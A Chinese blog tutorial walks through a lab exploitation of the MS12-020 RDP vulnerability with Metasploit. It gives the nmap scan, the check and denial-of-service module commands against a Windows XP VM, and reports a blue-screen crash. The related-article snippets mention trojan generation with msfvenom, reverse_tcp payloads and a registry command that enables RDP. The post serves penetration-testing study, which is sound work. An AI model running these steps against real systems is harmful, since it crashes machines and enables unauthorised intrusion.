kali渗透--msf简单使用

最新推荐文章于 2024-05-31 16:35:50 发布
最新推荐文章于 2024-05-31 16:35:50 发布
阅读量6.3k 收藏 52
点赞数 4
分类专栏: kali应用与学习
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_46635165/article/details/115802960
版权

使用MSF(Metasploit)利用MS12_020 RDP远程代码执行漏洞

实验环境准备

1)一台 winXP 作为受害者(最好拍摄好一个快照)IP:10.1.1.2
2)kali 作为攻击者 IP:10.1.1.1
3)将攻击者和受害者桥接到同一网段,使他们能够相互ping通

漏洞利用条件

1)winxp开启3389端口(RDP)
2)未安装 ms012-020补丁
3)关闭防火墙
4)同一局域网下

漏洞复现

1,在kali中使用nmap对XP进行端口探测,nmap -sS -Pn -A 10.1.1.2
 [*命令参数注释:-sS 半开式扫描,也称隐秘的TCP扫描 / -Pn 不进行ping主机探测,默认所有主机存活 / -A 高强度进攻式扫描]

在这里插入图片描述

2,确定受害者开放了3389端口,并且探测为winxp系统,在kali中输入 msfconsole 打开 metasploit ,
输入 search ms12_020 ,寻找漏洞验证与利用模块

在这里插入图片描述

3,可以看到两个模块,第一个为漏洞利用模块,第二个为漏洞验证模块,这里首先演示,使用第二个模块对3389漏洞进行验
证 ,use 1 或use auxiliary/scanner/rdp/ms12_020_check 进入漏洞验证模块,可以使用 show options 来
查看相关参数设置

在这里插入图片描述

4,对验证模块进行参数设置,从上图看到默认的参数设置是不完全正确的,所以 set rhosts 10.1.1.2 
[*参数注释:rhosts 设置需要进行漏洞验证的主机IP /rport 远程主机IP] ,
然后 run 开始进行漏洞验证,可以看见 The target is vulnerable. 表明漏洞有很大可能是存在的

在这里插入图片描述

5,证实了漏洞存在的可能,现在调用漏洞利用模块进行漏洞利用,先 search ms12_020,
然后 use 0 或 use auxiliary/dos/windows/rdp/ms12_020_maxchannelids, 
再次查看漏洞利用的参数设置:show options ,可以看见rhosts参数默认为空,设置漏洞利用主机ip:set rhosts 10.1.1.2,
然后 run 执行漏洞利用

在这里插入图片描述

6,客户端被攻击后直接蓝屏,再次提示:做实验前拍摄好快照,血的教训 ╥﹏╥...

在这里插入图片描述

我在干饭
关注
  • 4
    点赞
  • 52
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
网络安全kali web安全 Kali之msf简单的漏洞利用
xueshenlaila的博客
03-08 1万+
信息收集 靶机的IP地址为:192.168.173.136 利用nmap工具扫描其开放端口、系统等 整理一下目标系统的相关信息 系统版本:Windows server 2003 开放的端口及服务: 21/tcp ftp 135/tcp msrpc 139/tcp netbios-ssn 445/tcp microsoft-ds 777/tcp multiling-http 1025/tcp NFS-or-IIS 1026/tcp LSA-or-nterm 1029/tcp ms
70-70.渗透测试-kali更新msf.mp4
05-10
70-70.渗透测试-kali更新msf.mp4
渗透工具——kali中msf(后门生成模块msfvenom)
2301_78006725的博客
09-02 732
3. 通过邮件等方式上传到目标电脑,让目标电脑点击这个木马时,木马会在目标电脑后台运行(我这里就先用本机做一下试验)5. 然后run运行,同时点击桌面上的exe文件(不会出现画面,后进入后台运行)然后use exploit/multi/handler。成功拿到会话,就证明木马没问题,就可以进行操作啦!2. 点击文件管理,在root中查看是否已经生成完毕。show options完善信息。列出所有可用的payload;1. 生成shell。
【Web安全】kali渗透工具MSF以及msfconsole命令详解
最新发布
2301_77472496的博客
05-31 1084
记录一次体验kali渗透工具MSF以及msfconsole命令详解
网络安全:kali之MSF工具基本使用方法
Mr_qing的博客
10-08 5117
1、进入MSF工具:nsfconsole 2、查询漏洞利用工具:search 漏洞编号 3、打开工具:use 工具id 4、查看工具配置参数:show options 5、查看工具的详细信息:info 6、配置参数: set 参数头 目标主机 set 参数头 目标端口 (参数配置根据实际所缺参数为准) 7、运行工具:run或者exploit @返回命令:back @新版kali已经自动配置Payload;不需要再次自己配置(当然也可以自己配置:set payload windows/***/…
【MSF】Kali最强渗透工具之Metasploit
zou09241314的博客
10-23 1043
类似于msf有一个神奇的魔法,能让复杂的漏洞攻击的流程变得非常简单,一个电脑小白经过几小时的学习,就能对操作系统等主流漏洞发起危害性攻击。 永恒之蓝是指2017年4月14日晚,黑客团体Shadow Brokers(影子经纪人)公布一大批网络攻击工具,其中包含“永恒之蓝”工具,“永恒之蓝”利用Windows系统的SMB漏洞可以获取系统最高权限。
Kali Linux 学习日记5 - MS17_010
qq_46081990的博客
03-06 541
若其未开放,可以用命令让其开放:REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f。由于防火墙的原因,payload一般喜欢用反向tcp,原理是让靶机往外主动连攻击机:set payload windows/x64/meterpreter/reverse_tcp。搜索ms17_010漏洞:search ms17_010。
kali使用msf渗透win7(永恒之蓝操作复现)初学者指南
热门推荐
weixin_45596770的博客
04-18 1万+
首先开篇先放出我使用kali 与 win7 的网盘链接: 大家VMware上新建虚拟机即可~ 简单介绍一个Metasploit,一个免费的、开源的渗透测试框架,kali上可以直接使用~ 1. Metasploit初始化 在使用之前我们需要对Metasploit进行初始化,并启动: 终端窗口的命令行输入如下命令 systemctl start postgresql systemctl enable postgresql 启动专用的数据库,并设置为每次开机自动启动 msfconsole 或者 点击kali
kali 渗透msf
11-14
kali渗透测试利器
kali linux msf系列视频教程
10-25
kali msf 系列 第一章虚拟机使用 kali msf 系列 第一章虚拟机使用 kali msf 系列 第二章MSF基础使用+第一个实验 kali msf 系列 第三章浏览器漏洞提权 kali msf 系列 第四章利用快捷方式漏洞进行渗透提权 kali msf ...
E004-渗透测试常用工具-使用MSF实现Web传递获取靶机权限.pdf
12-02
3. **实验环境**:本课程的实验环境包括两台虚拟机,一台是渗透机(Kali Linux),另一台是靶机(Microsoft Windows 2008 Server)。渗透机用于发起攻击,靶机是攻击的目标。 4. **网络连通性测试**:在开始渗透...
kali-linux 工具Metasploit离线式攻击使用教程
12-29
在IT安全领域,Kali Linux是一款著名的开源渗透测试操作系统,其中包含了各种安全工具,而Metasploit则是其中的重要组件之一,主要用于进行安全漏洞利用和红队演练。本教程将聚焦于Metasploit的离线攻击使用方法,这...
kali的实战渗透
12-14
写的是kali的实战渗透,其中有讲msf渗透kali基础命令使用等等等,非常多
kali渗透测试漏洞扫描漏洞破解
02-09
KALI渗透测试之密码破解篇章,详细介绍kali的密码破解工具使用
E024-渗透测试常用工具-使用Armitage的MSF进行自动化集成渗透测试.pdf
12-02
本教程聚焦于使用Armitage工具结合Metasploit Framework (MSF)进行自动化集成渗透测试。 Armitage是一款基于图形用户界面的工具,它将Metasploit的功能进行了简化和可视化,方便测试者管理和执行渗透测试操作。...
E023-渗透测试常用工具-使用Armitage的MSF进行自动化集成渗透测试.pdf
12-02
在本课程中,重点介绍了如何使用Armitage工具结合Metasploit Framework (MSF)进行自动化集成渗透测试。Armitage是一个图形化的界面,使得复杂的MSF变得更加直观和易于操作。 首先,你需要启动实验环境,这包括两台...
KALI的MSF使用
Linux_get的博客
03-11 1007
记录学习一次Linux
kali:Nessus扫描漏洞并用msf利用攻击xp系统
qq_45747414的博客
11-23 5651
Nessus扫描漏洞 1.启动nessus服务 /bin/systemctl start nessusd.service 2.在浏览器打开https://192.168.50.128:8834/,登陆 3.进入开始扫描 在启动nessus过程中遇到的问题: NOTICE: Nessus has detected that API access on this scanner is disabled. 这里尝试了使用指令/opt/nessus/sbin/nessuscli update --all ##
kali渗透进入msf
10-31
Kali是一个被广泛应用于渗透测试和网络安全的Linux发行版。而Metasploit Framework(MSF)是一个开源的渗透测试框架,它提供了一系列功能强大的工具和资源,帮助渗透测试人员实施攻击并评估系统的安全性。 在Kali中,可以使用Metasploit Framework来进行渗透测试,以测试目标系统的安全性。下面是进入MSF的步骤: 1. 打开终端:首先,在Kali Linux中打开一个终端窗口。你可以使用快捷键Ctrl+Alt+T来打开终端,或者在菜单中找到终端应用。 2. 启动MSF控制台:在终端中输入msfconsole并按下回车键,这将启动Metasploit Framework控制台。 3. 更新MSF:在控制台中,输入命令msfupdate并按下回车键,这将确保你使用的是最新的Metasploit Framework版本。 4. 选择攻击模块:通过输入命令use来选择你想要使用的攻击模块。例如,如果你想要使用一个特定的漏洞攻击模块,可以输入use exploit/[exploit_name]命令。 5. 设置攻击选项:根据选定的攻击模块,通过输入set命令来设置攻击选项。这些选项可能包括目标IP地址、端口等。 6. 运行攻击:通过输入命令exploit来运行已设置好的攻击。控制台将显示攻击的进展情况,并提供相关的反馈信息。 需要注意的是,在进行渗透测试时,务必遵循法律和道德规范,并且只能在授权范围内对系统进行测试。任何未经授权的攻击行为都是非法的。
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值